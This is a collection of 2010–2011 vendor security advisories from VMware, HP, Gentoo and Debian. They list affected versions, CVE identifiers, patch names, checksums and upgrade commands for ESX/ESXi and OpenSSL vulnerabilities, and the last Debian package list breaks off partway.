remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi 4.1 ESXi ESXi410-201101201-SG
ESXi 4.0 ESXi affected, patch pending
ESXi 3.5 ESXi affected, patch pending
ESX 4.1 ESX ESX410-201101201-SG
ESX 4.0 ESX affected, patch pending
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
* hosted products are VMware Workstation, Player, ACE, Fusion.
h. ESXi third party component cURL updated
The version of cURL library in ESXi is updated.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-0734 to the issues addressed in
this update.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi 4.1 ESXi ESXi410-201101201-SG
ESXi 4.0 ESXi affected, patch pending
ESXi 3.5 ESXi affected, patch pending
ESX any ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
i. ESX third party component pam_krb5 updated
The version of pam_krb5 library is updated.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-3825 and CVE-2009-1384 to the
issues addressed in the update.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201101201-SG
ESX 4.0 ESX not affected
ESX 3.5 ESX not affected
ESX 3.0.3 ESX not affected
* hosted products are VMware Workstation, Player, ACE, Fusion.
j. ESX third party update for Service Console kernel
The Service Console kernel is updated to include kernel version
2.6.18-194.11.1.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,
CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,
CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,
CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,
CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,
CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,
CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and
CVE-2010-3081 to the issues addressed in the update.
Note: This update also addresses the 64-bit compatibility mode
stack pointer underflow issue identified by CVE-2010-3081. This
issue was patched in an ESX 4.1 patch prior to the release of
ESX 4.1 Update 1.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201101201-SG
ESX 4.0 ESX affected, patch pending
ESX 3.5 ESX not applicable
ESX 3.0.3 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
4. Solution
Please review the patch/release notes for your product and version
and verify the checksum of your downloaded file.
VMware vCenter Server 4.1 Update 1 and modules
----------------------------------------------
http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0
Release Notes:
http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html
File type: .iso
md5sum: 729cf247aa5d33ceec431c86377eee1a
sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0
File type: .zip
md5sum: fd1441bef48a153f2807f6823790e2f0
sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19
VMware vSphere Client
File type: .exe
md5sum: cb6aa91ada1289575355d79e8c2a9f8e
sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4
ESXi 4.1 Installable Update 1
-----------------------------
http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0
Release Notes:
http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html
http://kb.vmware.com/kb/1027919
File type: .iso
MD5SUM: d68d6c2e040a87cd04cd18c04c22c998
SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64
ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1)
File type: .zip
MD5SUM: 2f1e009c046b20042fae3b7ca42a840f
SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1
ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0)
File type: .zip
MD5SUM: 67b924618d196dafaf268a7691bd1a0f
SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516
ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5)
File type: .zip
MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4
SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488
VMware Tools CD image for Linux Guest OSes
File type: .iso
MD5SUM: dad66fa8ece1dd121c302f45444daa70
SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af
VMware vSphere Client
File type: .exe
MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e
SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4
ESXi Installable Update 1 contains the following security bulletins:
ESXi410-201101201-SG.
ESX 4.1 Update 1
----------------
http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0
Release Notes:
http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html
http://kb.vmware.com/kb/1029353
ESX 4.1 Update 1 (DVD ISO)
File type: .iso
md5sum: b9a275b419a20c7bedf31c0bf64f504e
sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11
ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1)
File type: .zip
md5sum: 2d81a87e994aa2b329036f11d90b4c14
sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798
Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1
File type: .zip
md5sum: 75f8cebfd55d8a81deb57c27def963c2
sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2
ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0)
File type: .zip
md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2
sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922
VMware Tools CD image for Linux Guest OSes
File type: .iso
md5sum: dad66fa8ece1dd121c302f45444daa70
sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af
VMware vSphere Client
File type: .exe
md5sum: cb6aa91ada1289575355d79e8c2a9f8e
sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4
ESX410-Update01 contains the following security bulletins:
ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL,
Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904
ESX410-201101226-SG (glibc) | http://kb.vmware.com/kb/1031330
ESX410-Update01 also contains the following non-security bulletins
ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG,
ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG,
ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG,
ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG,
ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG,
ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG.
To install an individual bulletin use esxupdate with the -b option.
5. References
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574
- ------------------------------------------------------------------------
6. Change log
2011-02-10 VMSA-2011-0003
Initial security advisory in conjunction with the release of vCenter
Server 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1
Update 1, and ESX 4.1 Update 1 on 2011-02-10.
- -----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2011 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
iEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9
dxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX
=2pVj
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02824483
Version: 1
HPSBOV02670 SSRT100475 rev.1 - HP OpenVMS running SSL, Remote Denial of Service (DoS), Unauthorized Disclosure of Information, Unauthorized Modification
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2011-05-05
Last Updated: 2011-05-05
Potential Security Impact: Remote Denial of Service (DoS), Unauthorized disclosure of information, unauthorized modification
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP OpenVMS running SSL. The vulnerabilities could be remotely exploited to create a Denial of Service (DoS) or unauthorized disclosure of information, or by a remote unauthorized user to modify data, prompts, or responses.
References: CVE-2011-0014, CVE-2010-4180, CVE-2010-4252, CVE-2010-3864
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP SSL for OpenVMS v 1.4 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2011-0014 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2010-4180 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2010-4252 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2010-3864 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve these vulnerabilities.
HP SSL V1.4-453 for OpenVMS Alpha and OpenVMS Integrity servers:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
HISTORY
Version:1 (rev.1) - 5 May 2011 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201110-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: OpenSSL: Multiple vulnerabilities
Date: October 09, 2011
Bugs: #303739, #308011, #322575, #332027, #345767, #347623,
#354139, #382069
ID: 201110-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities were found in OpenSSL, allowing for the
execution of arbitrary code and other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.0e >= 1.0.0e
Description
===========
Multiple vulnerabilities have been discovered in OpenSSL. Please review
the CVE identifiers referenced below for details.
Impact
======
A context-dependent attacker could cause a Denial of Service, possibly
execute arbitrary code, bypass intended key requirements, force the
downgrade to unintended ciphers, bypass the need for knowledge of
shared secrets and successfully authenticate, bypass CRL validation, or
obtain sensitive information in applications that use OpenSSL.
Resolution
==========
All OpenSSL users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.0e"
NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since September 17, 2011. It is likely that your system is
already no longer affected by most of these issues.
References
==========
[ 1 ] CVE-2009-3245
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3245
[ 2 ] CVE-2009-4355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4355
[ 3 ] CVE-2010-0433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0433
[ 4 ] CVE-2010-0740
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0740
[ 5 ] CVE-2010-0742
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0742
[ 6 ] CVE-2010-1633
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1633
[ 7 ] CVE-2010-2939
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2939
[ 8 ] CVE-2010-3864
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3864
[ 9 ] CVE-2010-4180
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4180
[ 10 ] CVE-2010-4252
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4252
[ 11 ] CVE-2011-0014
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0014
[ 12 ] CVE-2011-3207
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3207
[ 13 ] CVE-2011-3210
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3210
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-2125-1 security@debian.org
http://www.debian.org/security/ Stefan Fritsch
November 22, 2010 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : openssl
Vulnerability : buffer overflow
Problem type : remote
Debian-specific: no
Debian Bug : 603709
CVE Id(s) : CVE-2010-3864
A flaw has been found in the OpenSSL TLS server extension code parsing
which on affected servers can be exploited in a buffer overrun attack.
This upgrade fixes this issue. After the upgrade, any services using the
openssl libraries need to be restarted. The checkrestart script from the
debian-goodies package or lsof can help to find out which services need
to be restarted.
A note to users of the tor packages from the Debian backports or Debian
volatile: This openssl update causes problems with some versions of tor.
You need to update to tor 0.2.1.26-4~bpo50+1 or 0.2.1.26-1~lennyvolatile2,
respectively. The tor package version 0.2.0.35-1~lenny2 from Debian stable
is not affected by these problems.
For the stable distribution (lenny), the problem has been fixed in
openssl version 0.9.8g-15+lenny9.
For the testing distribution (squeeze) and the unstable distribution
(sid), this problem has been fixed in version 0.9.8o-3.
We recommend that you upgrade your openssl packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny (stable)
- -----------------------------------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g.orig.tar.gz
Size/MD5 checksum: 3354792 acf70a16359bf3658bdfb74bda1c4419
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9.dsc
Size/MD5 checksum: 1973 1efb69f23999507bf2e74f5b848744af
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9.diff.gz
Size/MD5 checksum: 60451 9aba44ed40b0c9c8ec82bd6cd33c44b8
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_alpha.deb
Size/MD5 checksum: 2583248 3b3f0cbec4ec28eb310466237648db8f
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_alpha.deb
Size/MD5 checksum: 1028998 79fe8cdd601aecd9f956033a04fb8da5
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_alpha.udeb
Size/MD5 checksum: 722114 a388304bf86381229c306e79a5e85bf8
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_alpha.deb
Size/MD5 checksum: 2814160 e0f6fc697f5e9c87b44aa15eb58c3ea8
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_alpha.deb
Size/MD5 checksum: 4369318 c3cf8c7ec27f86563c34f45e986e17c4
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_amd64.deb
Size/MD5 checksum: 975850 778916e8b0df8e216121cd5185d7ca43
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_amd64.deb
Size/MD5 checksum: 2243180 ff6a898ccd6fb49d5fbec9f4bd3cb6da
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_amd64.udeb
Size/MD5 checksum: 638414 9ea111d66ac5f394d35fb69defa5dd27
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_amd64.deb
Size/MD5 checksum: 1627632 9f08e1da5cf9279cee4700e89dc6ee6d
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_amd64.deb
Size/MD5 checksum: 1043320 9ada82a7417c0d714a38c3a7184c2401
arm architecture (ARM)
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_arm.udeb
Size/MD5 checksum: 536038 a9c90bb3ad326fa43c1285c1768df046
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_arm.deb
Size/MD5 checksum: 2087048 bded4e624fcf0791ae0885aa18d99123
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_arm.deb
Size/MD5 checksum: 1028894 20784774078f02ef7e9db2ddbd7d5548
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_arm.deb
Size/MD5 checksum: 1490666 700c80efddb108b3e2a65373cc10dcc8
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_arm.deb
Size/MD5 checksum: 844426 4cad5651a6d37ab19fb80b05a423598d
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_armel.deb
Size/MD5 checksum: 1029206 6c6c35731ecacfc0280520097ee183d4
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_armel.udeb
Size/MD5 checksum: 540780 3b9ab48015bbd4dfc1ab205b42f1113d
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_armel.deb
Size/MD5 checksum: 2100958 fbf2c222a504e09e30f73cb0740a73a5
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_armel.deb
Size/MD5 checksum: 1504318 8eaa760844c1b81d0f8bd21bdc7ca1d0
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_armel.deb
Size/MD5 checksum: 850286 3e656a0805eb31600f8e3e520a2a6e36
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_hppa.deb
Size/MD5 checksum: 2268562 8cb4805915dfde8326fde4281c9aaa76
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_hppa.deb
